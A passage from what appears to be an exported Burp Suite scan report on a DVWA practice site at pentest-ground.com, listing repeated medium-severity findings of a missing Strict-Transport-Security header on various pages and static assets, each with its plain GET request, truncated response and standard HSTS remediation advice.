Last-Modified: Tue, 21 Nov 2023 11:18:49 GMT
ETag: "281fb-60aa7c44ae30b"
Accept-Ranges: bytes
.PNG
.
...IHDR................H... pHYs.................IDATx...y\T.................%j.X.f.K..ijV.Z..nz3.j....V..-j..V.Z.en.... n...&0..c.a..a..A}......s..9...y..(....h.j..99.d.....CNN6j...F.F...4.
...[SNIP]...
9.14. https://pentest-ground.com:4280/docs/graphics/docker/overview.png
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/docs/graphics/docker/overview.png |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
There was no "Strict-Transport-Security" header in the server response.
Remediation detail
A Strict-Transport-Security HTTP header should be sent with each HTTPS response. The syntax is as follows:
Strict-Transport-Security: max-age=<seconds>[; includeSubDomains]
The parameter max-age gives the time frame for requirement of HTTPS in seconds and should be chosen quite high, e.g. several months. A value below 7776000 is considered as too low by this scanner check. The flag includeSubDomains defines that the policy applies also for sub domains of the sender of the response.
Request 1
GET /docs/graphics/docker/overview.png HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=71714f1a9cde023a53997f100bf78363
Referer: https://pentest-ground.com:4280/instructions.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:18 GMT
Content-Type: image/png
Content-Length: 73209
Connection: close
Last-Modified: Tue, 21 Nov 2023 11:18:49 GMT
ETag: "11df9-60aa7c44ae30b"
Accept-Ranges: bytes
.PNG
.
...IHDR................H... pHYs.................IDATx...y\T.......&. .(....
..Z
j........K.....%.R*.&e.Vje.e..{.......,...l.9,.?f....6qy....s.=..g...9..9.... _..CCC...aT..FF.000.........=..
...[SNIP]...
9.15. https://pentest-ground.com:4280/dvwa/css/help.css
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/dvwa/css/help.css |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
There was no "Strict-Transport-Security" header in the server response.
Remediation detail
A Strict-Transport-Security HTTP header should be sent with each HTTPS response. The syntax is as follows:
Strict-Transport-Security: max-age=<seconds>[; includeSubDomains]
The parameter max-age gives the time frame for requirement of HTTPS in seconds and should be chosen quite high, e.g. several months. A value below 7776000 is considered as too low by this scanner check. The flag includeSubDomains defines that the policy applies also for sub domains of the sender of the response.
Request 1
GET /dvwa/css/help.css HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/css,*/*;q=0.1
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=e3e80b2e1e73cd41e7284684082f1165
Referer: https://pentest-ground.com:4280/vulnerabilities/view_help.php?id=brute&security=low&locale=en
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:38:12 GMT
Content-Type: text/css
Content-Length: 304
Connection: close
Last-Modified: Tue, 21 Nov 2023 11:18:49 GMT
ETag: "130-60aa7c44ae30b-gzip"
Accept-Ranges: bytes
Vary: Accept-Encoding
body {
background-color: #e7e7e7;
font-family: Arial, Helvetica, sans-serif;
font-size: 13px;
}
h1 {
font-size: 25px;
}
div#container {
}
div#code {
background-color: #ffffff;
}
...[SNIP]...
9.16. https://pentest-ground.com:4280/dvwa/css/login.css
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/dvwa/css/login.css |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
There was no "Strict-Transport-Security" header in the server response.
Remediation detail
A Strict-Transport-Security HTTP header should be sent with each HTTPS response. The syntax is as follows:
Strict-Transport-Security: max-age=<seconds>[; includeSubDomains]
The parameter max-age gives the time frame for requirement of HTTPS in seconds and should be chosen quite high, e.g. several months. A value below 7776000 is considered as too low by this scanner check. The flag includeSubDomains defines that the policy applies also for sub domains of the sender of the response.
Request 1
GET /dvwa/css/login.css HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/css,*/*;q=0.1
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=d018a445946d614889512423e2b94708
Referer: https://pentest-ground.com:4280/login.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:38 GMT
Content-Type: text/css
Content-Length: 842
Connection: close
Last-Modified: Tue, 21 Nov 2023 11:18:49 GMT
ETag: "34a-60aa7c44ae30b-gzip"
Accept-Ranges: bytes
Vary: Accept-Encoding
body {
background: #fefffe;
font: 12px/15px Arial, Helvetica, sans-serif;
line-height: 20px;
color: #6b6b6b;
}
#wrapper {
text-align: center;
margin: 0 auto;
}
#content {
display
...[SNIP]...
9.17. https://pentest-ground.com:4280/dvwa/css/main.css
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/dvwa/css/main.css |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
There was no "Strict-Transport-Security" header in the server response.
Remediation detail
A Strict-Transport-Security HTTP header should be sent with each HTTPS response. The syntax is as follows:
Strict-Transport-Security: max-age=<seconds>[; includeSubDomains]
The parameter max-age gives the time frame for requirement of HTTPS in seconds and should be chosen quite high, e.g. several months. A value below 7776000 is considered as too low by this scanner check. The flag includeSubDomains defines that the policy applies also for sub domains of the sender of the response.
Request 1
GET /dvwa/css/main.css HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/css,*/*;q=0.1
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=68b03ae0039a78fdaed2f3a1fec06032
Referer: https://pentest-ground.com:4280/vulnerabilities/xss_d/?default=German
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:15 GMT
Content-Type: text/css
Content-Length: 4026
Connection: close
Last-Modified: Tue, 21 Nov 2023 11:18:49 GMT
ETag: "fba-60aa7c44ae30b-gzip"
Accept-Ranges: bytes
Vary: Accept-Encoding
body {
margin: 0;
color: #2f2f2f;
font: 12px/15px Arial, Helvetica, sans-serif;
min-width: 981px;
height: 100%;
position: relative;
}
body.home {
background: #e7e7e7;
}
div.clear
...[SNIP]...
9.18. https://pentest-ground.com:4280/dvwa/css/source.css
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/dvwa/css/source.css |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
There was no "Strict-Transport-Security" header in the server response.
Remediation detail
A Strict-Transport-Security HTTP header should be sent with each HTTPS response. The syntax is as follows:
Strict-Transport-Security: max-age=<seconds>[; includeSubDomains]
The parameter max-age gives the time frame for requirement of HTTPS in seconds and should be chosen quite high, e.g. several months. A value below 7776000 is considered as too low by this scanner check. The flag includeSubDomains defines that the policy applies also for sub domains of the sender of the response.
Request 1
GET /dvwa/css/source.css HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/css,*/*;q=0.1
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=0469bf99ed333ec9d4bed463704811d5
Referer: https://pentest-ground.com:4280/vulnerabilities/view_source.php?id=brute&security=low
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:36:07 GMT
Content-Type: text/css
Content-Length: 319
Connection: close
Last-Modified: Tue, 21 Nov 2023 11:18:49 GMT
ETag: "13f-60aa7c44ae30b-gzip"
Accept-Ranges: bytes
Vary: Accept-Encoding
body {
background-color: #e7e7e7;
font-family: Arial, Helvetica, sans-serif;
font-size: 13px;
}
h1 {
font-size: 25px;
}
div#container {
}
div#code {
background-color: #ffffff;
}
...[SNIP]...
9.19. https://pentest-ground.com:4280/dvwa/images/lock.png
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/dvwa/images/lock.png |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
There was no "Strict-Transport-Security" header in the server response.
Remediation detail
A Strict-Transport-Security HTTP header should be sent with each HTTPS response. The syntax is as follows:
Strict-Transport-Security: max-age=<seconds>[; includeSubDomains]
The parameter max-age gives the time frame for requirement of HTTPS in seconds and should be chosen quite high, e.g. several months. A value below 7776000 is considered as too low by this scanner check. The flag includeSubDomains defines that the policy applies also for sub domains of the sender of the response.
Request 1
GET /dvwa/images/lock.png HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: PHPSESSID=cc1aefef1476eee2f6c22b6683bf0c38; security=impossible
Referer: https://pentest-ground.com:4280/security.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:35 GMT
Content-Type: image/png
Content-Length: 761
Connection: close
Last-Modified: Tue, 21 Nov 2023 11:18:49 GMT
ETag: "2f9-60aa7c44ae30b"
Accept-Ranges: bytes
.PNG
.
...IHDR...............o.....IDATx.....kg.......A..m..l.....|....pm.6OO..........E...[W...4.M..}...P!........bf._......6...D...}PNgGK?P3;;3....X\..Nc....................AM..o.W...?.w.zvff...
...[SNIP]...
9.20. https://pentest-ground.com:4280/dvwa/images/login_logo.png
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/dvwa/images/login_logo.png |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
There was no "Strict-Transport-Security" header in the server response.
Remediation detail
A Strict-Transport-Security HTTP header should be sent with each HTTPS response. The syntax is as follows:
Strict-Transport-Security: max-age=<seconds>[; includeSubDomains]
The parameter max-age gives the time frame for requirement of HTTPS in seconds and should be chosen quite high, e.g. several months. A value below 7776000 is considered as too low by this scanner check. The flag includeSubDomains defines that the policy applies also for sub domains of the sender of the response.
Request 1
GET /dvwa/images/login_logo.png HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=d018a445946d614889512423e2b94708
Referer: https://pentest-ground.com:4280/login.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:38 GMT
Content-Type: image/png
Content-Length: 9088
Connection: close
Last-Modified: Tue, 21 Nov 2023 11:18:49 GMT
ETag: "2380-60aa7c44ae30b"
Accept-Ranges: bytes
.PNG
.
...IHDR.......r...... ....#GIDATx....pd.....;...m..m..m...z<wl..d....._w.}........U......Z..*U....(.f...8..8..1.....W....$.D.D.f.._(J.H.J..u8.'.@r
=.0$..(...\.....<......X.m.. ..pX.DQ....`;
...[SNIP]...
9.21. https://pentest-ground.com:4280/dvwa/images/logo.png
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/dvwa/images/logo.png |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
There was no "Strict-Transport-Security" header in the server response.
Remediation detail
A Strict-Transport-Security HTTP header should be sent with each HTTPS response. The syntax is as follows:
Strict-Transport-Security: max-age=<seconds>[; includeSubDomains]
The parameter max-age gives the time frame for requirement of HTTPS in seconds and should be chosen quite high, e.g. several months. A value below 7776000 is considered as too low by this scanner check. The flag includeSubDomains defines that the policy applies also for sub domains of the sender of the response.
Request 1
GET /dvwa/images/logo.png HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=68b03ae0039a78fdaed2f3a1fec06032
Referer: https://pentest-ground.com:4280/vulnerabilities/xss_d/?default=German
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:15 GMT
Content-Type: image/png
Content-Length: 5044
Connection: close
Last-Modified: Tue, 21 Nov 2023 11:18:49 GMT
ETag: "13b4-60aa7c44ae30b"
Accept-Ranges: bytes
.PNG
.
...IHDR...i...<.....e..~...{IDATx......h....l..m...*.:.gMp.m...6f....[....d..k.....3..er....8.I..u..Z ..B.
..r..V.."../fEl...7.....m.
.XZ.q.V_..b>.O[....-WWlWKu\5....'.f.>....|v...t....m..KY
...[SNIP]...
9.22. https://pentest-ground.com:4280/dvwa/images/spanner.png
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/dvwa/images/spanner.png |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
There was no "Strict-Transport-Security" header in the server response.
Remediation detail
A Strict-Transport-Security HTTP header should be sent with each HTTPS response. The syntax is as follows:
Strict-Transport-Security: max-age=<seconds>[; includeSubDomains]
The parameter max-age gives the time frame for requirement of HTTPS in seconds and should be chosen quite high, e.g. several months. A value below 7776000 is considered as too low by this scanner check. The flag includeSubDomains defines that the policy applies also for sub domains of the sender of the response.
Request 1
GET /dvwa/images/spanner.png HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=823c02c4926209a190f21de98c4aef51
Referer: https://pentest-ground.com:4280/setup.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:20 GMT
Content-Type: image/png
Content-Length: 464
Connection: close
Last-Modified: Tue, 21 Nov 2023 11:18:49 GMT
ETag: "1d0-60aa7c44ae30b"
Accept-Ranges: bytes
.PNG
.
...IHDR..............A......IDATx...5.SQ.....:\...C.}.p:...<.uo..}.uw.eqw'>...m..s.x...w2.\Dt.f..=~....j].!Sn...|...L. g.....2?.r.(55..<aPQ.../^......FRU..^a._.JJJ...d...G..<7..;.l......i...
...[SNIP]...
9.23. https://pentest-ground.com:4280/dvwa/js/add_event_listeners.js
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/dvwa/js/add_event_listeners.js |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
There was no "Strict-Transport-Security" header in the server response.
Remediation detail
A Strict-Transport-Security HTTP header should be sent with each HTTPS response. The syntax is as follows:
Strict-Transport-Security: max-age=<seconds>[; includeSubDomains]
The parameter max-age gives the time frame for requirement of HTTPS in seconds and should be chosen quite high, e.g. several months. A value below 7776000 is considered as too low by this scanner check. The flag includeSubDomains defines that the policy applies also for sub domains of the sender of the response.
Request 1
GET /dvwa/js/add_event_listeners.js HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=68b03ae0039a78fdaed2f3a1fec06032
Referer: https://pentest-ground.com:4280/vulnerabilities/xss_d/?default=German
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:15 GMT
Content-Type: text/javascript
Content-Length: 593
Connection: close
Last-Modified: Tue, 21 Nov 2023 11:18:49 GMT
ETag: "251-60aa7c44ae30b-gzip"
Accept-Ranges: bytes
Vary: Accept-Encoding
// These functions need to be called after the content they reference
// has been added to the page otherwise they will fail.
function addEventListeners() {
var source_button = document.getElementBy
...[SNIP]...
9.24. https://pentest-ground.com:4280/dvwa/js/dvwaPage.js
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/dvwa/js/dvwaPage.js |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
There was no "Strict-Transport-Security" header in the server response.
Remediation detail
A Strict-Transport-Security HTTP header should be sent with each HTTPS response. The syntax is as follows:
Strict-Transport-Security: max-age=<seconds>[; includeSubDomains]
The parameter max-age gives the time frame for requirement of HTTPS in seconds and should be chosen quite high, e.g. several months. A value below 7776000 is considered as too low by this scanner check. The flag includeSubDomains defines that the policy applies also for sub domains of the sender of the response.
Request 1
GET /dvwa/js/dvwaPage.js HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=68b03ae0039a78fdaed2f3a1fec06032
Referer: https://pentest-ground.com:4280/vulnerabilities/xss_d/?default=German
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:15 GMT
Content-Type: text/javascript
Content-Length: 1030
Connection: close
Last-Modified: Tue, 21 Nov 2023 11:18:49 GMT
ETag: "406-60aa7c44ae30b-gzip"
Accept-Ranges: bytes
Vary: Accept-Encoding
/* Help popup */
function popUp(URL) {
day = new Date();
id = day.getTime();
window.open(URL, '" + id + "', 'toolbar=0,scrollbars=1,location=0,statusbar=0,menubar=0,resizable=1,width=800,heig
...[SNIP]...
9.25. https://pentest-ground.com:4280/hackable/uploads/
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/hackable/uploads/ |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
There was no "Strict-Transport-Security" header in the server response.
Remediation detail
A Strict-Transport-Security HTTP header should be sent with each HTTPS response. The syntax is as follows:
Strict-Transport-Security: max-age=<seconds>[; includeSubDomains]
The parameter max-age gives the time frame for requirement of HTTPS in seconds and should be chosen quite high, e.g. several months. A value below 7776000 is considered as too low by this scanner check. The flag includeSubDomains defines that the policy applies also for sub domains of the sender of the response.
Request 1
GET /hackable/uploads/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=c89a7d1e75ef5e86c9d7f0c35ff5c80c
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 403 Forbidden
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:37:59 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 283
Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access this resource.</p>
<hr>
<address>Ap
...[SNIP]...
9.26. https://pentest-ground.com:4280/instructions.php
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/instructions.php |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
There was no "Strict-Transport-Security" header in the server response.
Remediation detail
A Strict-Transport-Security HTTP header should be sent with each HTTPS response. The syntax is as follows:
Strict-Transport-Security: max-age=<seconds>[; includeSubDomains]
The parameter max-age gives the time frame for requirement of HTTPS in seconds and should be chosen quite high, e.g. several months. A value below 7776000 is considered as too low by this scanner check. The flag includeSubDomains defines that the policy applies also for sub domains of the sender of the response.
Request 1
GET /instructions.php?doc=PDF HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=c75ac127e20686129d48c0244418acaf
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/instructions.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:42 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 3169
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Instructions :: Damn Vulnerable Web Application (DVWA)</title>
<link
...[SNIP]...
9.27. https://pentest-ground.com:4280/login.php
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/login.php |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
There was no "Strict-Transport-Security" header in the server response.
Remediation detail
A Strict-Transport-Security HTTP header should be sent with each HTTPS response. The syntax is as follows:
Strict-Transport-Security: max-age=<seconds>[; includeSubDomains]
The parameter max-age gives the time frame for requirement of HTTPS in seconds and should be chosen quite high, e.g. several months. A value below 7776000 is considered as too low by this scanner check. The flag includeSubDomains defines that the policy applies also for sub domains of the sender of the response.
Request 1
GET /login.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=d018a445946d614889512423e2b94708
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:38 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 1441
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Login :: Damn Vulnerable Web Application (DVWA)</title>
<l
...[SNIP]...
9.28. https://pentest-ground.com:4280/logout.php
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/logout.php |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
There was no "Strict-Transport-Security" header in the server response.
Remediation detail
A Strict-Transport-Security HTTP header should be sent with each HTTPS response. The syntax is as follows:
Strict-Transport-Security: max-age=<seconds>[; includeSubDomains]
The parameter max-age gives the time frame for requirement of HTTPS in seconds and should be chosen quite high, e.g. several months. A value below 7776000 is considered as too low by this scanner check. The flag includeSubDomains defines that the policy applies also for sub domains of the sender of the response.
Request 1
GET /logout.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=d018a445946d614889512423e2b94708
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 302 Found
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:38 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: login.php
9.29. https://pentest-ground.com:4280/phpinfo.php
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/phpinfo.php |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
There was no "Strict-Transport-Security" header in the server response.
Remediation detail
